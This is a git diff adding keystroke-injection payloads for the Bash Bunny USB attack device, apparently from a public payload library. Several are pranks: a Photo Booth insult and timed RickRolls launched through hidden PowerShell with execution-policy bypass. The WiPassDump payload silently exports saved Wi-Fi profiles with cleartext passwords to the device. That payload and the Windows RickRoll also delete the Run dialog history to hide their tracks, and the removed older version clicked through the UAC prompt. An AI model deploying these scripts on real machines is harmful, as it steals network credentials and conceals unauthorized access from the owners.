diff --git a/payloads/library/Pranks/Ascii-Prank/art b/payloads/library/Pranks/Ascii-Prank/art new file mode 100755 index 00000000..e43717b3 --- /dev/null +++ b/payloads/library/Pranks/Ascii-Prank/art @@ -0,0 +1,22 @@ + __ /^\ + .' \ / :.\ + / \ | :: \ + / /. \ / ::: | + | |::. \ / :::'/ + | / \::. | / :::'/ + `--` \' `~~~ ':'/` + / ( + / 0 _ 0 \ + \/ \_/ \/ + -== '.' | '.' ==- + /\ '-^-' /\ + \ _ _ / + .-`-((\o/))-`-. + _ / //^\\ \ _ +."o".( , .:::. , )."o". +|o o\\ \:::::/ //o o| + \ \\ |:::::| // / + \ \\__/:::::\__// / + \ .:.\ `':::'` /.:. / + \':: |_ _| ::'/ + `---` `"""""` `---` diff --git a/payloads/library/Pranks/Ascii-Prank/payload.txt b/payloads/library/Pranks/Ascii-Prank/payload.txt new file mode 100755 index 00000000..944e61bb --- /dev/null +++ b/payloads/library/Pranks/Ascii-Prank/payload.txt @@ -0,0 +1,17 @@ +ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E + +LED R 300 + +Q GUI SPACE +Q DELAY 200 +Q STRING terminal +Q DELAY 400 +Q ENTER +Q DELAY 400 +Q GUI N +Q DELAY 100 +Q STRING cat /Volumes/BashBunny/payloads/switch2/art +Q DELAY 100 +Q ENTER + +LED G diff --git a/payloads/library/Pranks/Photo-Booth-Ugly-Prank/README.md b/payloads/library/Pranks/Photo-Booth-Ugly-Prank/README.md new file mode 100644 index 00000000..ef34ae56 --- /dev/null +++ b/payloads/library/Pranks/Photo-Booth-Ugly-Prank/README.md @@ -0,0 +1,25 @@ +# Photo booth ugly prank for Bash Bunny + +* Author: Jafahulo +* Version: Version 1.0 +* Target: OSX + +## Description + +Quick payload that takes a photo of target, and tells them that they're ugly + +REQUIRES THE BASH BUNNY TO BE PLUGGED IN THE FULL TIME + +## Configuration + +None needed + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red (blinking) | Running | +| Green | Attack Complete | + +## Discussion +none diff --git a/payloads/library/Pranks/Photo-Booth-Ugly-Prank/payload.txt b/payloads/library/Pranks/Photo-Booth-Ugly-Prank/payload.txt new file mode 100755 index 00000000..f9828c91 --- /dev/null +++ b/payloads/library/Pranks/Photo-Booth-Ugly-Prank/payload.txt @@ -0,0 +1,77 @@ +ATTACKMODE HID VID_0X05AC PID_0X021E + +LED R 200 + +Q DELAY 1000 +Q GUI SPACE +Q DELAY 100 +Q STRING photo booth +Q DELAY 300 +Q ENTER +Q DELAY 3500 +Q ENTER +Q DELAY 500 +Q GUI 1 +Q DELAY 5000 +Q GUI SPACE +Q DELAY 100 +Q STRING textEdit +Q DELAY 100 +Q ENTER +Q DELAY 1000 +Q GUI N +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI B +Q STRING saaaayyyy You look ugly! +Q DELAY 100 +Q ENTER + +LED G diff --git a/payloads/library/Pranks/UnifiedRickRoll/README.md b/payloads/library/Pranks/UnifiedRickRoll/README.md new file mode 100644 index 00000000..ba34acda --- /dev/null +++ b/payloads/library/Pranks/UnifiedRickRoll/README.md @@ -0,0 +1,22 @@ +# UnifiedRickRoll for Bash Bunny + +* Author: Jafahulo +* Version: Version 1.0 +* Target: OSX + +## Description +Runs a script in background that will crank up volume and rick roll target at specified time. + +## Configuration + +set time to run in payload.txt + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red (blinking) | Running | +| Green | Attack Complete | + +## Discussion +https://forums.hak5.org/index.php?/topic/40618-payload-unifiedrickroll/ diff --git a/payloads/library/Pranks/UnifiedRickRoll/payload.txt b/payloads/library/Pranks/UnifiedRickRoll/payload.txt new file mode 100755 index 00000000..c59d5611 --- /dev/null +++ b/payloads/library/Pranks/UnifiedRickRoll/payload.txt @@ -0,0 +1,24 @@ +ATTACKMODE HID VID_0X05AC PID_0X021E + +time=1734 + +LED R 200 + +Q GUI SPACE +Q DELAY 200 +Q STRING terminal +Q DELAY 100 +Q ENTER +Q DELAY 1000 +Q GUI n +Q DELAY 1000 + +Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while test \$hi == \'0\'\; do if [ \$ho == $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown + +# close up shop +Q DELAY 1000 +Q ENTER +Q GUI W +Q ENTER + +LED G diff --git a/payloads/library/Pranks/UnifiedRickRollWindows/README.md b/payloads/library/Pranks/UnifiedRickRollWindows/README.md new file mode 100644 index 00000000..4c707d06 --- /dev/null +++ b/payloads/library/Pranks/UnifiedRickRollWindows/README.md @@ -0,0 +1,38 @@ +# UnifiedRickRoll for Bash Bunny + +* Author: Jafahulo +* Version: Version 1.0 +* Target: Windows + +## Description +Runs a script in background that will crank up volume and rick roll target at specified time. Also removes 'run' diologue history to "hide" tracks + +The format for the time is as follows: How many hours have passed since midnight + how many minutes have passed since that hour started. + + + +As an example: 1:39am would be 139, 1:39pm would be 1339 (it's in 24 hour format, not 12), 5:03pm would be 173, and 5:02am would be 52. + + + +This is kinda confusing at first, but if you tinker with it for a couple minutes, it's pretty easy to figure out. + +Additionally, you can run this in any powershell window, and it will set the current time in that format to $time: + +$time=(Get-Date).Hour.toString()+(Get-Date).Minute.toString() + + +## Configuration + +set time to run in payload.txt + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red (blinking) | Running | +| Blue (blinking) | Cleaning up +| Green | Attack Complete | + +## Discussion +https://forums.hak5.org/index.php?/topic/40621-payload-unifiedrickrollwindows/ diff --git a/payloads/library/Pranks/UnifiedRickRollWindows/payload.txt b/payloads/library/Pranks/UnifiedRickRollWindows/payload.txt new file mode 100755 index 00000000..e6804ef8 --- /dev/null +++ b/payloads/library/Pranks/UnifiedRickRollWindows/payload.txt @@ -0,0 +1,34 @@ +ATTACKMODE HID VID_0X05AC PID_0X021E + +#Use format described in the readme +time=1051 + +#run payload + +LED R 200 + +Q GUI r + +Q DELAY 200 + +Q STRING cmd -A '/t:fe /k mode con: lines=1 cols=15' +Q DELAY 200 +Q ENTER +Q DELAY 500 +Q STRING powershell -NoP -NonI -W Hidden -Exec Bypass \$hi=0\; \$ho=\(Get-Date\).Hour.toString\(\)\; while \(\$hi -eq \'0\'\) \{ if \(\$ho -eq $time \) \{\$vol=new-object -com wscript.shell\; For\(\$i=0\; \$i -le 50\; \$i\+\+\)\{\$vol.SendKeys\(\[char\]175\)\}\; start \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; \$hi=1\; \} \$ho=\(Get-Date\).Hour.toString\(\)\+\(Get-Date\).Minute.toString\(\)\;\} + + + +Q DELAY 500 + +Q ENTER + +#Hide tracks +LED B 500 + + QUACK GUI r + QUACK DELAY 1000 + QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" + QUACK ENTER + +LED G diff --git a/payloads/library/WiPassDump/a.cmd b/payloads/library/WiPassDump/a.cmd deleted file mode 100644 index 858b01e0..00000000 --- a/payloads/library/WiPassDump/a.cmd +++ /dev/null @@ -1,6 +0,0 @@ -REM Go to dump directory -cd /d %~dp0 -cd ../../loot/WiPassDump/ - -REM Dump saved Wi-Fi infos -netsh wlan export profile key=clear \ No newline at end of file diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt old mode 100644 new mode 100755 index c141d948..0339e924 --- a/payloads/library/WiPassDump/payload.txt +++ b/payloads/library/WiPassDump/payload.txt @@ -1,56 +1,55 @@ -#!/bin/bash -# -# Title: WiPassDump -# Author: samdeg555 -# Version: 1.0 -# Target: Windows -# -# Runs powershell as Administrator -# Bypasses UAC -# Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny -# - -LED R 200 - -# Create directory to dump infos -mkdir -p /root/udisk/loot/WiPassDump - -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh - -# Set language accordingly -Q SET_LANGUAGE ca - -ATTACKMODE HID STORAGE - -LED B 200 - -# Launch powershell as admin -Q GUI r -Q DELAY 100 -Q STRING powershell Start-Process powershell -Verb runAs -Q ENTER - -# Bypass UAC -Q DELAY 3000 -Q ALT o -Q ENTER -Q DELAY 500 - -# Start a.cmd -Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/' -Q STRING $SWITCH_POSITION -Q STRING '/a.cmd'"'"')' -Q ENTER - -# Wait for a.cmd to finish and exit - -LED R B 500 - -Q DELAY 3000 -Q STRING exit -Q ENTER - -sync - -LED G +# Title: WiPassDump +# Author: jafahulo -- Cred: samdeg555, hak5darren +# Version: 2.0 +# Target: Windows +# +# Runs powershell script to dump clear text passwords to \loot\WiPassDump +# Runs powershell script to remove "run" prompt history - creds for this go to hak5darren. +# +# Red Blinking..........Running +# Blue Blinking.........Removing tracks +# Green.................Finished +################################################ + +ATTACKMODE HID STORAGE + +# Create directory under loot to store passwords in +mkdir -p /root/udisk/loot/WiPassDump + +LED R 200 + +# Open windows run console + +Q GUI r +Q DELAY 1000 + +# enter payload and execute + +Q STRING powershell -WindowStyle Hidden \$bunny\=\(gwmi win32_volume -f \'label=\\\"BashBunny\\\"\'\).NAME\; cd \$bunny\\loot\\WiPassDump\; netsh wlan export profile key=clear +Q ENTER + +#Let code run, then sync + +Q DELAY 5000 + +sync + +# Wait for misc. to happen on computer + +Q DELAY 1000 + +# Hide tracks + +LED B 500 + + QUACK GUI r + QUACK DELAY 1000 + QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" + QUACK ENTER + +QUACK DELAY 1000 + +# Done! + +LED G + diff --git a/payloads/library/WiPassDump/readme.md b/payloads/library/WiPassDump/readme.md index 72412ab6..988dde13 100644 --- a/payloads/library/WiPassDump/readme.md +++ b/payloads/library/WiPassDump/readme.md @@ -1,26 +1,24 @@ -# WiPassDump for Bash Bunnys - -* Author: samdeg555 -* Version: Version 1.0 -* Target: Windows - -## Description - -Dumps saved Wi-Fi infos including clear text passwords to the bash bunny -Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder. - -## Configuration - -None needed. - -## STATUS - -| LED | Status | -| ------------------ | -------------------------------------------- | -| Red (blinking) | Setting up | -| Blue (blinking) | Attack running | -| Purple (blinking) | Almost done (cleaning up) | -| Green | Attack Complete | - -## Discussion -None yet. +# WiPassDump for Bash Bunnys + +* Author: Jafahulo --creds: samdeg555, hak5darren +* Version: Version 2.0 +* Target: Windows + +## Description + +Dumps saved Wi-Fi infos including clear text passwords to the bash bunny +Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder. + +## Configuration + +None needed. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red (blinking) | Running | +| Green | Attack Complete | + +## Discussion +None yet.